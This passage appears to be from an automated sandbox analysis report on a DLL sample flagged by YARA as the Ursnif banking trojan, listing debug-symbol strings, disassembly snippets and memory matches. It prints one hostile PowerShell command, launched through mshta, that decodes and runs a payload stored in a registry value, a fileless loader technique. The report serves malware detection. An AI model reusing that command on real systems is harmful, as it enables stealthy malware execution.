              Source: Binary string: c:\201\Their\Quart-Sheet\497_who\Bed.pdb source: rundll32.exe, 00000002.00000002.444299096.000000006E191000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.616072901.000000006E191000.00000002.00020000.sdmp, WerFault.exe, 00000014.00000003.411602089.0000000004DE1000.00000004.00000001.sdmp, lj3H69Z3Io.dll
              Source: Binary string: powrprof.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: netapi32.pdbD source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: ole32.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
              Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp
              Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: netapi32.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp
              Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp
              Source: Binary string: combase.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp
              Source: Binary string: rundll32.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
              Source: Binary string: wtsapi32.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: iphlpapi.pdb' source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: sfc_os.pdbS source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: sfc.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: apphelp.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
              Source: Binary string: wuser32.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
              Source: Binary string: wntdll.pdbk source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
              Source: Binary string: c:\201\Their\Quart-Sheet\497_who\Bed.pdbbj source: WerFault.exe, 00000014.00000003.412073889.0000000004DB5000.00000004.00000001.sdmp
              Source: Binary string: netutils.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: Nc:\201\Their\Quart-Sheet\497_who\Bed.pdb source: WerFault.exe, 00000014.00000003.411494273.0000000004E04000.00000004.00000001.sdmp

              Data Obfuscation:

              Suspicious powershell command line found
              Source: C:\Windows\System32\mshta.exe, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
              Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_6E141F7C LoadLibraryA,GetProcAddress
              Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 2_2_6E17446D push ecx; ret 2_2_6E174480
              Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 2_2_6E142D07 push ebp; ret 2_2_6E142D17
              Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 2_2_6E174AC6 push ecx; ret 2_2_6E174AD9
              Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_6E142200 push ecx; ret 3_2_6E142209
              Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_6E142253 push ecx; ret 3_2_6E142263
              Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_6E17446D push ecx; ret 3_2_6E174480
              Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_6E174AC6 push ecx; ret 3_2_6E174AD9
              Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_6E1BF506 push ds; ret 3_2_6E1BF508

              Hooking and other Techniques for Hiding and Protection:

              Yara detected Ursnif
              Source: Yara match, File source: 3.3.rundll32.exe.4f594a0.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 00000003.00000003.556259843.0000000004DDC000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match, File source: 00000003.00000003.537141120.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match, File source: 00000003.00000003.537104299.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match, File source: 00000003.00000003.536940847.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match, File source: 00000003.00000003.548180639.0000000004F59000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match, File source: 00000003.00000003.537188735.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match, File source: 00000003.00000003.537165510.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match, File source: 00000003.00000003.537047715.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match, File source: 00000003.00000003.536909133.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match, File source: 00000003.00000003.536969040.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
              Source: C:\Windows\SysWOW64\rundll32.exe, Registry key monitored for changes: HKEY_CURRENT_USER_Classes
              Source: C:\Windows\SysWOW64\rundll32.exe, Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\rundll32.exe